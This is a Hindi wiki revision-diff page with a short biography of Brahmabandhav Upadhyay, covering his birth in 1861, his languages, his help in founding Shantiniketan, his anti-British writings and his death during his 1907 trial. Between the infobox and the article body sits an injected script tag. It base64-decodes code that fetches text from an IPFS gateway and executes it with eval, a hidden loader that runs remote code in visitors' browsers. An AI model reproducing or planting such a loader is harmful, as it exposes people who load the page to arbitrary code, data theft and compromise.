Difference between revisions of "ब्रह्मबांधव उपाध्याय"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replacement - "विद्वान " to "विद्वान् ")
 
Line 18: Line 18:
 
|शीर्षक 2=सम्बंधित व्यक्ति
 
|शीर्षक 2=सम्बंधित व्यक्ति
 
|पाठ 2=[[रवींद्रनाथ टैगोर]], [[शांति निकेतन]]
 
|पाठ 2=[[रवींद्रनाथ टैगोर]], [[शांति निकेतन]]
|अन्य जानकारी=ब्रह्मबांधव उपाध्याय ने भारतीय दर्शनशास्त्र पर [[इंग्लैंड]] में कई भाषण दिए। बाद के [[दिन|दिनों]] में कई पत्रों का संपादन किया और [[अंग्रेज़|अंग्रेज़ों]] के विरूद्ध उत्तेजक लेख लिखे।
+
|अन्य जानकारी=ब्रह्मबांधव उपाध्याय ने [[दर्शनशास्त्र|भारतीय दर्शनशास्त्र]] पर [[इंग्लैंड]] में कई भाषण दिए। बाद के [[दिन|दिनों]] में कई पत्रों का संपादन किया और [[अंग्रेज़|अंग्रेज़ों]] के विरुद्ध उत्तेजक लेख लिखे।
 
|बाहरी कड़ियाँ=
 
|बाहरी कड़ियाँ=
 
|अद्यतन=04:31, [[4 मार्च]]-[[2017]] (IST)
 
|अद्यतन=04:31, [[4 मार्च]]-[[2017]] (IST)
Line 26: Line 26:
 
ब्रह्मबांधव उपाध्याय का जन्म 1 फ़रवरी, 1861 को कलकत्ता (कोलकत्ता), पश्चिम बंगाल के निकट खन्नन में हुआ था।
 
ब्रह्मबांधव उपाध्याय का जन्म 1 फ़रवरी, 1861 को कलकत्ता (कोलकत्ता), पश्चिम बंगाल के निकट खन्नन में हुआ था।
 
==लेखक==
 
==लेखक==
ब्रह्मबांधव उपाध्याय एक प्रकांड विद्वान् थे जिनका [[हिंदी भाषा|हिंदी]], [[अंग्रेज़ी भाषा|अंग्रेज़ी]], [[संस्कृत भाषा|संस्कृत]] और [[फारसी भाषा|फारसी भाषाओं]] पर असाधरण अधिकार था। वे पहले अध्याक थे। ब्रह्मबांधव उपाध्याय ने [[रवींद्रनाथ टैगोर|गुरूदेव श्री रवींद्रनाथ टैगोर]] की [[शांति निकेतन]] की स्थापना में सहयोग दिया।  भारतीय दर्शनशास्त्र पर [[इंग्लैंड]] में ब्रह्मबांधव उपाध्याय ने कई भाषण दिए। इन्होंने बाद के [[दिन|दिनों]] में कई पत्रों का संपादन किया और [[अंग्रेज़|अंग्रेज़ों]] के विरूद्ध उत्तेजक लेख लिखे।
+
ब्रह्मबांधव उपाध्याय एक प्रकांड विद्वान् थे जिनका [[हिंदी भाषा|हिंदी]], [[अंग्रेज़ी भाषा|अंग्रेज़ी]], [[संस्कृत भाषा|संस्कृत]] और [[फारसी भाषा|फारसी भाषाओं]] पर असाधारण अधिकार था। वे पहले अध्यापक थे। ब्रह्मबांधव उपाध्याय ने [[रवींद्रनाथ टैगोर|गुरूदेव श्री रवींद्रनाथ टैगोर]] की [[शांति निकेतन]] की स्थापना में सहयोग दिया।  भारतीय दर्शनशास्त्र पर [[इंग्लैंड]] में ब्रह्मबांधव उपाध्याय ने कई भाषण दिए। इन्होंने बाद के [[दिन|दिनों]] में कई पत्रों का संपादन किया और [[अंग्रेज़|अंग्रेज़ों]] के विरुद्ध उत्तेजक लेख लिखे।
  
 
==मृत्यु==
 
==मृत्यु==
[[3 सितंबर]], [[1907]] को ब्रह्मबांधव उपाध्याय गिरफ्तार हुए और अदालत में अपनी सारी जिम्मेदारी स्वीकार कर ली। जब मुकदमा चल रहा था कि बिमारी के कारण [[27 अक्तूबर]], 1907 को देहावसान हो गया।
+
[[3 सितंबर]], [[1907]] को ब्रह्मबांधव उपाध्याय गिरफ़्तार हुए और अदालत में अपनी सारी ज़िम्मेदारी स्वीकार कर ली। जब मुक़दमा चल रहा था कि बिमारी के कारण [[27 अक्तूबर]], 1907 को देहावसान हो गया।
  
  

Latest revision as of 07:55, 13 October 2017

brahmabaandhav upadhyay
poora nam brahmabaandhav upadhyay
janm 1 faravari, 1861
janm bhoomi kalakatta, pashchim bangal
mrityu 27 aktoobar, 1907
sambandhit vyakti raviandranath taigor, shaanti niketan
any janakari brahmabaandhav upadhyay ne bharatiy darshanashastr par ianglaiand mean kee bhashan die. bad ke dinoan mean kee patroan ka sanpadan kiya aur aangrezoan ke viruddh uttejak lekh likhe.
adyatan‎ 04:31, 4 march-2017 (IST)

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

brahmabaandhav upadhyay (aangrezi: Brahmabandhav Upadhyay, janm- 1 faravari, 1861, kalakatta, pashchim bangal; mrityu- 27 aktoobar, 1907) bharatiy svatantrata senani, patrakar, dharmashastri aur rahasyavadi the. inhoanne guroodev shri raviandranath taigor ki shaanti niketan ki sthapana mean sahayog diya.[1]

janm

brahmabaandhav upadhyay ka janm 1 faravari, 1861 ko kalakatta (kolakatta), pashchim bangal ke nikat khannan mean hua tha.

lekhak

brahmabaandhav upadhyay ek prakaand vidvanh the jinaka hiandi, aangrezi, sanskrit aur pharasi bhashaoan par asadharan adhikar tha. ve pahale adhyapak the. brahmabaandhav upadhyay ne guroodev shri raviandranath taigor ki shaanti niketan ki sthapana mean sahayog diya. bharatiy darshanashastr par ianglaiand mean brahmabaandhav upadhyay ne kee bhashan die. inhoanne bad ke dinoan mean kee patroan ka sanpadan kiya aur aangrezoan ke viruddh uttejak lekh likhe.

mrityu

3 sitanbar, 1907 ko brahmabaandhav upadhyay giraftar hue aur adalat mean apani sari zimmedari svikar kar li. jab muqadama chal raha tha ki bimari ke karan 27 aktoobar, 1907 ko dehavasan ho gaya.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. brahmabaandhav upadhyay (hiandi) kraanti 1857. abhigaman tithi: 4 march, 2017.

sanbandhit lekh

  1. REDIRECTsaancha:svatantrata senani